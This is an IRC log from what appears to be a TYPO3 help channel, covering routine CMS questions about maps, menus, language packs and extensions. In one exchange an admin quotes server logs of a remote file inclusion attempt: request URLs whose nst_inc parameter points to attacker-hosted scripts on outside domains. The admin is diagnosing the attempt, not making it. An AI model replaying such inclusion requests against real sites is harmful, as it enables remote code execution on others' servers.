| 00:52 |
ckoehler |
ddoesburg: am now |
| 00:52 |
ckoehler |
what's up? |
| 00:53 |
ddoesburg |
Hi Christoph |
| 00:53 |
ddoesburg |
It's about the wec-map |
| 00:53 |
ckoehler |
k |
| 00:53 |
ddoesburg |
As you know it's now not working in IE6 |
| 00:54 |
ckoehler |
ya |
| 00:54 |
ddoesburg |
Any idea when you have fixed that? |
| 00:54 |
ckoehler |
not my bug |
| 00:54 |
ddoesburg |
That means |
| 00:54 |
ckoehler |
can't fix it :) |
| 00:54 |
ckoehler |
it's google's coe |
| 00:54 |
ckoehler |
code |
| 00:55 |
ckoehler |
see this? |
| 00:55 |
ckoehler |
http://webempoweredchurch.com/support/community/forum/single_thread/ministry-tools/map-extension/quotoperation-abortedquot-in-ie6/ |
| 00:55 |
ddoesburg |
Ok If google releases a new version, the wec-map uses that automaticaly |
| 00:55 |
ckoehler |
yes |
| 00:55 |
ckoehler |
in the dev version you can select which maps api version to load |
| 00:56 |
ckoehler |
so that may help |
| 00:56 |
ckoehler |
we're fairly conservative though |
| 00:56 |
ddoesburg |
Ok That would be nice. Thanks a lot |
| 00:56 |
ckoehler |
don't load the stable, but not the edge either |
| 00:56 |
ckoehler |
just follow the instructions in the forum post for details |
| 00:56 |
ddoesburg |
The link above? |
| 00:56 |
ckoehler |
yeah |
| 00:57 |
ddoesburg |
Thank you |
| 00:57 |
ckoehler |
no problem |
| 00:57 |
ckoehler |
i'm off again |
| 00:57 |
ckoehler |
see ya |
| 00:57 |
ddoesburg |
Now it's bedtime. One o'clock |
| 00:57 |
ddoesburg |
Bye |
| 01:36 |
adcn |
is there a newsletter application like phplist which can be easily used or integrated with typo3? |
| 04:18 |
ries_away |
anybody have experience with a large multi-domain multi-language multi-users websitres? |
| 09:20 |
mikhas |
Heya. I've noticed after upgrading several sites to 4.1.7 that they still don't work With FF3 (3.0.1). Does anyone know if it's an extension that is causing this? |
| 09:31 |
dinsdale07 |
what does that mean "don't work" ? |
| 09:32 |
mikhas |
the upgrade should also fix the FF3-bug in the backend. After you've logged in to the backend and click on something in the left menu, the left-menu disappears. |
| 09:32 |
mikhas |
@ dinsdale07 |
| 09:33 |
mikhas |
The upgrade solves the problem on some sites and not on others, so I'm thinking if it's an extension that is also causing this? I'm trying to find it by trial and error - no success so far. |
| 09:34 |
dinsdale07 |
I see, I was on that Version for a while but I did not have this problem at all. |
| 09:34 |
mikhas |
neither have I on some pages. seems to be an extension. |
| 09:35 |
dinsdale07 |
Are you talking about the modules or the pagetree btw |
| 09:41 |
dinsdale07 |
:mikhas have you read this ? http://wiki.typo3.org/index.php/TYPO3_4.1#Pagetree_not_displayed_correctly |
| 09:43 |
dinsdale07 |
:mikhas btw the pagetree was also rewritten in 4.2 |
| 09:45 |
mikhas |
dinsdale07: thanks. no, I've read it now but this seems to be aimed at older installations. I use t3skin which they recommend. |
| 09:45 |
m4rtijn |
hi all |
| 09:47 |
dinsdale07 |
I'm just about to loose my temper with tinyRTE and <br /> and <p>'s. It seems <br />'s are not saved into the database although tinyRTE displays them correctly in the html source. |
| 09:48 |
dinsdale07 |
Does anyone have an idea maybe? |
| 09:50 |
m4rtijn |
never used tinyrte |
| 09:53 |
dinsdale07 |
I think it's actually something to do with typo3. I somehow have to tell it to preserve the br before saving into the database |
| 09:56 |
dinsdale07 |
I already set RTE.default.proc.dontConvBRtoParagraph = 1 but it doesn't help. |
| 09:56 |
Stoffel |
something wrong with htmlarea? |
| 09:58 |
dinsdale07 |
:Stoffel I'm actually using tinyRTE. tinyRTE displays it correctly in source mode. |
| 10:36 |
xN33D |
morning everyone |
| 10:38 |
xN33D |
iam stuck with something.. iam busy to make a website with a dynamic header.. i made it before on a other website but this time it is killing me.. i made a content element with an image without any with or height changes |
| 10:39 |
xN33D |
the image is: 867px * 95px.. but in the output he is 600px * 66px |
| 10:39 |
xN33D |
and in the html is this code: <dl class="csc-textpic-image csc-textpic-firstcol csc-textpic-lastcol" style="width:600px;"> |
| 10:39 |
xN33D |
style="width:600px;" ??? i on't understand where that comes from.. |
| 10:39 |
xN33D |
please.. anybody? |
| 10:41 |
xN33D |
if i look in the uploads/pics folder, the image is just the normal width and height: 867px * 95px |
| 10:44 |
xN33D |
W T F.. i found the solution.. Template -> Constant editor -> Category CONTENT -> Max Image Width |
| 10:44 |
xN33D |
is that standard in 4.2.1 ? i never changed it.. and never had this problem before.. |
| 10:45 |
mikhas |
xN33D: : yeah.. that is pretty much standard. have puzzled me sometimes too. :) |
| 10:45 |
mikhas |
xN33D: It can be useful at times though. |
| 10:45 |
mikhas |
xN33D: it's that way in Typo3 4.1 as well. |
| 10:49 |
xN33D |
Oh.. oke never had problems with it.. but iam glad i figured it out.. :) |
| 10:50 |
dinsdale07 |
:xN33D I find above useful if you have to resize a bunch of images on a page to the same size. e.G pass photos of many people. Very neat. |
| 10:53 |
dinsdale07 |
forget my comment above, nonsense.Anyway, that's it: mv tinyRTE > dev/null. |
| 10:58 |
beeeviz |
can anyone tell me where to get the current german language pack for typo3? |
| 10:58 |
beeeviz |
(4.2.1) |
| 10:59 |
xN33D |
you can do it in the backend.. don't need to install a package |
| 11:00 |
beeeviz |
nope. loading of external files is disabled on the damn server :/ |
| 11:00 |
beeeviz |
so i have to download it anywhere |
| 11:00 |
dinsdale07 |
http://www.typo3.net/faq/installation/backend_sprachpakete_fuer_typo3_version_40_rc_1/ |
| 11:00 |
dinsdale07 |
That's the latest I use. But what do you have to look for in backend to install there? |
| 11:01 |
beeeviz |
oh thanks! |
| 11:01 |
dinsdale07 |
It's for 4.0 I don't know whether there were new options though ... |
| 11:05 |
dinsdale07 |
how can I download the language pack directly in the backend... ? |
| 11:09 |
beeeviz |
extension manager |
| 11:09 |
beeeviz |
translation handling |
| 11:13 |
dinsdale07 |
:beeeviz thanks mate :-) I didn't know that. |
| 11:15 |
prakashatl |
Could anyone help me setting up a seperate home page for each frontend user group? |
| 11:35 |
prakashatl_ |
hi |
| 11:38 |
spabhat |
hi |
| 12:17 |
crisb2010 |
hi guys |
| 12:17 |
m4rtijn |
re |
| 12:18 |
crisb2010 |
i created a menu in typo3 and it works fine ... but there is one detail that i couldnt figure out. how can i pass a class to the first <li>? |
| 12:18 |
m4rtijn |
optionsplit crisb |
| 12:19 |
m4rtijn |
wrap combined with optionsplit |
| 12:19 |
crisb2010 |
let me take a look and thanks for the hint |
| 12:19 |
m4rtijn |
yw |
| 12:26 |
crisb2010 |
<m4rtijn> got it working. thanks again. |
| 12:27 |
m4rtijn |
yw |
| 12:45 |
okapi |
hi |
| 13:03 |
crisb2010 |
is there a way to force typo3 to output my menu in a nice way with tabs. right now its putting the whole stuff into one line |
| 13:04 |
Stoffel |
what do you mean with "force"? |
| 13:04 |
m4rtijn |
style it with css crisb2010 |
| 13:12 |
dinsdale07 |
I think he means the source code.. |
| 13:12 |
maholtz|WORK |
crisb2010: tidy - perhaps an extension or an config option? |
| 13:23 |
xN33D |
crisb2010: http://www.rggooglemap.com/en/dev/rgtabs.html :) |
| 13:27 |
adnc |
hello, is there a typo3 extension for newsletters which also gives me the possibility to have subscription pages? |
| 13:28 |
Katagia |
Hi. Someone has tried to hack my webpage. Logfile is showing this: [Wed Jul 30 15:06:15 2008] [error] [client 62.75.240.22] PHP Warning: parse_url(/templates/headline_temp.php?nst_inc=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt???) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse url in /srv/www/htdocs/typo3_src/typo3/sysext/cms/tslib/class.tslib_fe.php on line 629. I don't kn |
| 13:28 |
Katagia |
I inspected the external code and it seems to try to execute commands on the server. |
| 13:30 |
Katagia |
The user typo3 is running has only limitted access, homepage hasen't changed. I just want to make sure this was just an unsuccessful try |
| 13:32 |
maholtz|WORK |
@Katagia: well, the parse_url error message indicates, that the code has been executed via typo3. |
| 13:33 |
maholtz|WORK |
headline_temp.php should not be executed directly |
| 13:34 |
adnc |
Katagia: are you hosting a turkish site? |
| 13:35 |
Katagia |
No I'm not. It's a german one. why do you ask? |
| 13:35 |
adnc |
yavuzselimlisesi.com is a turkish highscool and the pages are directed to a bloodbank |
| 13:36 |
adnc |
Katagia: are you german? |
| 13:36 |
Katagia |
Yes I am |
| 13:36 |
adnc |
das ist gut ;-) |
| 13:38 |
Katagia |
I think somebody has tried to get access. As written I'm not the typo3 maintainer. If this is just a wanring someone has tried an unsuccessfull hack everything is fine. If not I will have a very direct talk with the maintainer. |
| 13:39 |
maholtz|WORK |
@Katagia: you should check if that php file was executed directly |
| 13:40 |
locnguyen |
can I make multi language with power mail |
| 13:41 |
locnguyen |
please help me to set new language for field label |
| 13:41 |
locnguyen |
by typoscript |
| 13:46 |
locnguyen |
are there anyone know about powermail, please help me |
| 13:50 |
adnc |
are there experiences with single sign on of horde and typo3 users? |
| 13:52 |
m4rtijn |
hm? |
| 13:53 |
adnc |
m4rtijn: was this for me? |
| 13:53 |
m4rtijn |
yes |
| 13:53 |
adnc |
i would like to integrate my hore mail application to my typo3, so i was wondering if this has someone done before |
| 13:55 |
locnguyen |
can I make multi language with power mail |
| 13:55 |
locnguyen |
please help me ! I am die now |
| 13:56 |
locnguyen |
i will be fired |
| 14:08 |
locnguyen |
poor me! |
| 14:16 |
Katagia |
@maholtz: I was able to reproduce my issue: http://www.myserver.de//templates/headline_temp.php?nst_inc=http://www.nomina3p.hu/nomina3p/components/com_joomlalib/standalone/pw.txt? will show a Warning in error log but it won't execute the foreign code. The problem is the double // behing the domain name. When a single / is used, http://www.servername.de/templates/headline_temp.php?nst_inc=http://www.nomina3p.hu/nomina3p/components/com_joomlalib |
| 14:43 |
m4rtijn |
hmm |
| 14:44 |
Katagia |
I was able to reduce the code to http://myserver//:/ to proucde the same kind of error. Maybe a rewrite rule is going mad. The good new is my server is Ok |
| 14:45 |
adnc |
Katagia: ;-) |
| 14:46 |
m4rtijn |
Katagia - which typo3 version r u using? |
| 14:51 |
Katagia |
Well it's 4.1.1 I hope a recent one. I only manage the base server, not the typo3 installation. |
| 14:52 |
m4rtijn |
nah.. its quite old.. |
| 14:52 |
m4rtijn |
maybe u could tell the typo3 admin to upgrade to 4.1.7 .. |
| 14:53 |
Katagia |
Yes I will do that. thank you for your support |
| 15:01 |
youam |
is there a typo3 database reference somewhere? e.g. what is stored in the 'uc' column of the 'be_users' table? |
| 15:03 |
just2b |
youam the settzings the user made? |
| 15:03 |
just2b |
without the ? |
| 15:05 |
youam |
just2b: but there isn't any reference somewhere? |
| 15:08 |
just2b |
imo no |
| 15:09 |
mikhas |
would fit perfectly in the typo3wiki though. just some basic info about what the general fields and tables are used for. |
| 15:10 |
mikhas |
can't say that I'm an expert in it myself :) but I can see it's usefulness |
| 15:22 |
just2b |
yes, begin with it! |
| 15:32 |
mikhas |
pid = parent id, uid = user id ;) |
| 15:32 |
mikhas |
deleted = deleted |
| 15:32 |
mikhas |
hidden = hidden |
| 15:33 |
mikhas |
that's an effort. I'm all exhausted now. :-P |
| 15:37 |
just2b |
oh you are the man.... |
| 15:38 |
m4rtijn |
it was so funny.. |
| 15:43 |
swemark |
uid = unique id? :) |
| 15:43 |
maholtz|WORK |
@swemark: yes |
| 15:44 |
maholtz|WORK |
tt_content (typo-table content:) |
| 16:29 |
adnc |
is there a link to typo3 based websites, specially one which i could show someone and impress him? |
| 16:29 |
just2b |
typo3.org is a directory |
| 16:29 |
adnc |
typo3.com i found references |
| 16:30 |
adnc |
just2b: do you have a link for me please |
| 16:34 |
m4rtijn |
about - sites made with typo3 |
| 16:43 |
animan |
hi, anyone has an idea how to make an TS exception to tt_news that tells to wrap <div class="author">|</div> only when author exists to current article, otherwise does nothing? |
| 16:57 |
crisb2010 |
is there a way to pass an alt text to an image in a navigation? |
| 16:58 |
beeeviz |
can anyone tell me where the f****** space before the xmlprologue comes from? -> http://mobil.dortmund-airport.de/mobil.html |
| 16:58 |
beeeviz |
this is my template http://nopaste.tshw.de/1217862412a8208/ |
| 16:59 |
beeeviz |
and disableAllHeaderCode is set to true via typoscript |
| 16:59 |
beeeviz |
i'm totally helpless |
| 17:04 |
beeeviz |
oh it was in an included phpscript |
| 17:04 |
beeeviz |
:> |
| 17:28 |
crisb2010 |
if someone has a clue how to fill the alt text of an image in the menu, drop me a line please :) |
| 18:53 |
animan |
can i detect if my TS wrap isn't empty with ifNotBlank {} ? |
| 18:57 |
animan |
or can i define else condition is ifBlank ? |
| 18:58 |
animan |
with* |
| 19:15 |
effects |
hi all, whats the best way to impliment Google analytics code into a typo3 site? |
| 19:16 |
effects |
put it in the html template? .... put the code into a hidden content element? i duno, anyone got an idea? |
| 20:03 |
LaXeL |
Can anyone help? i have this code in TS : |
| 20:03 |
LaXeL |
subparts.CUVINTE_CHEIE<plugin.tx_vgetagcloud_pi1 |
| 20:03 |
LaXeL |
subparts.CUVINTE_CHEIE{ |
| 20:03 |
LaXeL |
referenceTable=tt_news |
| 20:03 |
LaXeL |
referenceFields=title |
| 20:03 |
LaXeL |
targetPage=25 |
| 20:03 |
LaXeL |
} |
| 20:03 |
LaXeL |
and i get this errors: |
| 20:03 |
LaXeL |
Warning: min() [function.min]: Array must contain at least one element in /Users/<removed>/public_html/typo3conf/ext/vge_tagcloud/pi1/class.tx_vgetagcloud_pi1.php on line 633 |
| 20:03 |
LaXeL |
Warning: max() [function.max]: Array must contain at least one element in /Users/<removed>/public_html/typo3conf/ext/vge_tagcloud/pi1/class.tx_vgetagcloud_pi1.php on line 634 |
| 20:03 |
LaXeL |
can anyone help....i'm a noob |
| 23:38 |
Frooty |
hi @all |
| 23:38 |
Frooty |
i have a problem with my extension... |
| 23:38 |
Frooty |
i created a frontend plugin with kickstarter |
| 23:38 |
Frooty |
and added the content element to my site |
| 23:39 |
Frooty |
the p1 class has already generated code in it |
| 23:39 |
Frooty |
but this generated form wont show up on my site |
| 23:40 |
Frooty |
its like the p1 main function isnt even called |
| 23:45 |
dokma |
hi guys! :) |
| 23:45 |
dokma |
I forgot how to fetch extension folder from the extensions own php files... |
| 23:49 |
Mirrakor |
Hm.. it looks like my site has two templates - but I want it to use just the one of those two.. |